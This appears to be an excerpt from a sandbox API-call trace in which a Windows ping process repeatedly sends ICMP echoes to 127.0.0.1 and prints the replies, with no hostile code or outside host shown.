0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] LocalFree (hMem=0xf47fd8) returned 0x0 [0060.813] LocalFree (hMem=0xf47fa0) returned 0x0 [0060.813] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _get_osfhandle (_FileHandle=1) returned 0x28 [0060.813] GetFileType (hFile=0x28) returned 0x2 [0060.813] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0060.813] GetLastError () returned 0x6 [0060.813] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.813] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] LocalFree (hMem=0xf38a30) returned 0x0 [0060.813] LocalFree (hMem=0xf47fa0) returned 0x0 [0060.813] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _get_osfhandle (_FileHandle=1) returned 0x28 [0060.813] GetFileType (hFile=0x28) returned 0x2 [0060.813] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0060.813] GetLastError () returned 0x6 [0060.813] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.813] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] LocalFree (hMem=0xf38a60) returned 0x0 [0060.813] LocalFree (hMem=0xf47fa0) returned 0x0 [0060.813] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.814] _get_osfhandle (_FileHandle=1) returned 0x28 [0060.814] GetFileType (hFile=0x28) returned 0x2 [0060.814] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0060.814] GetLastError () returned 0x6 [0060.814] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0060.814] _fileno (_File=0x76ea4c28) returned 1 [0060.814] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0060.814] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.814] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0060.814] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0060.814] _fileno (_File=0x76ea4c28) returned 1 [0060.814] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0060.814] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.814] _fileno (_File=0x76ea4c28) returned 1 [0060.814] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0060.814] LocalFree (hMem=0xf38a60) returned 0x0 [0060.814] LocalFree (hMem=0xf47fa0) returned 0x0 [0060.814] Sleep (dwMilliseconds=0x3e8) [0061.827] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0061.828] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0061.828] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0061.828] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0061.828] GetFileType (hFile=0x28) returned 0x2 [0061.828] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0061.828] GetLastError () returned 0x6 [0061.828] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.828] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0061.828] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0061.828] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0061.828] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.828] LocalFree (hMem=0xf47fd8) returned 0x0 [0061.828] LocalFree (hMem=0xf47fa0) returned 0x0 [0061.828] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0061.828] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0061.828] GetFileType (hFile=0x28) returned 0x2 [0061.828] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0061.828] GetLastError () returned 0x6 [0061.828] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.828] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0061.828] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0061.828] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0061.828] _fileno (_File=0x76ea4c28) returned 1 [0061.828] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0061.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.829] LocalFree (hMem=0xf389a0) returned 0x0 [0061.829] LocalFree (hMem=0xf47fa0) returned 0x0 [0061.829] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0061.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _get_osfhandle (_FileHandle=1) returned 0x28 [0061.829] GetFileType (hFile=0x28) returned 0x2 [0061.829] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0061.829] GetLastError () returned 0x6 [0061.829] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0061.829] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a90 [0061.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _write (in: _FileHandle=1, _Buf=0xf38a90*, _MaxCharCount=0x9 | out: _Buf=0xf38a90*) returned 9 [0061.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0061.829] LocalFree (hMem=0xf38a90) returned 0x0 [0061.829] LocalFree (hMem=0xf47fa0) returned 0x0 [0061.829] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0061.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _get_osfhandle (_FileHandle=1) returned 0x28 [0061.829] GetFileType (hFile=0x28) returned 0x2 [0061.829] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0061.829] GetLastError () returned 0x6 [0061.829] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0061.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0061.829] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0061.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0061.829] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0061.829] _fileno (_File=0x76ea4c28) returned 1 [0061.829] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0061.829] LocalFree (hMem=0xf389a0) returned 0x0 [0061.829] LocalFree (hMem=0xf47fa0) returned 0x0 [0061.829] Sleep (dwMilliseconds=0x3e8) [0062.843] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0062.843] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0062.843] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0062.843] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.843] _fileno (_File=0x76ea4c28) returned 1 [0062.843] _get_osfhandle (_FileHandle=1) returned 0x28 [0062.843] GetFileType (hFile=0x28) returned 0x2 [0062.844] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0062.844] GetLastError () returned 0x6 [0062.844] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0062.844] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0062.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.844] LocalFree (hMem=0xf47fd8) returned 0x0 [0062.844] LocalFree (hMem=0xf47fa0) returned 0x0 [0062.844] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0062.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _get_osfhandle (_FileHandle=1) returned 0x28 [0062.844] GetFileType (hFile=0x28) returned 0x2 [0062.844] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0062.844] GetLastError () returned 0x6 [0062.844] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.844] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0062.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.844] LocalFree (hMem=0xf389a0) returned 0x0 [0062.844] LocalFree (hMem=0xf47fa0) returned 0x0 [0062.844] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0062.844] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _get_osfhandle (_FileHandle=1) returned 0x28 [0062.844] GetFileType (hFile=0x28) returned 0x2 [0062.844] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0062.844] GetLastError () returned 0x6 [0062.844] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.844] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a90 [0062.844] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0062.844] _fileno (_File=0x76ea4c28) returned 1 [0062.844] _write (in: _FileHandle=1, _Buf=0xf38a90*, _MaxCharCount=0x9 | out: _Buf=0xf38a90*) returned 9 [0062.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.845] _fileno (_File=0x76ea4c28) returned 1 [0062.845] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0062.845] LocalFree (hMem=0xf38a90) returned 0x0 [0062.845] LocalFree (hMem=0xf47fa0) returned 0x0 [0062.845] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0062.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.845] _fileno (_File=0x76ea4c28) returned 1 [0062.845] _get_osfhandle (_FileHandle=1) returned 0x28 [0062.845] GetFileType (hFile=0x28) returned 0x2 [0062.845] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0062.845] GetLastError () returned 0x6 [0062.845] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0062.845] _fileno (_File=0x76ea4c28) returned 1 [0062.845] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0062.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.845] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0062.845] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0062.845] _fileno (_File=0x76ea4c28) returned 1 [0062.845] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0062.845] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0062.845] _fileno (_File=0x76ea4c28) returned 1 [0062.845] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0062.845] LocalFree (hMem=0xf389a0) returned 0x0 [0062.845] LocalFree (hMem=0xf47fa0) returned 0x0 [0062.845] Sleep (dwMilliseconds=0x3e8) [0063.861] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0063.862] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0063.862] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0063.862] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.862] _fileno (_File=0x76ea4c28) returned 1 [0063.862] _get_osfhandle (_FileHandle=1) returned 0x28 [0063.862] GetFileType (hFile=0x28) returned 0x2 [0063.862] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0063.862] GetLastError () returned 0x6 [0063.862] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0063.862] _fileno (_File=0x76ea4c28) returned 1 [0063.862] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0063.862] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0063.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0063.862] _fileno (_File=0x76ea4c28) returned 1 [0063.862] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0063.862] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.862] _fileno (_File=0x76ea4c28) returned 1 [0063.862] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.863] LocalFree (hMem=0xf47fd8) returned 0x0 [0063.863] LocalFree (hMem=0xf47fa0) returned 0x0 [0063.863] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0063.863] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _get_osfhandle (_FileHandle=1) returned 0x28 [0063.863] GetFileType (hFile=0x28) returned 0x2 [0063.863] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0063.863] GetLastError () returned 0x6 [0063.863] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0063.863] _fileno (_File=0x76ea4c28) returned 1 [0063.863] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0063.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 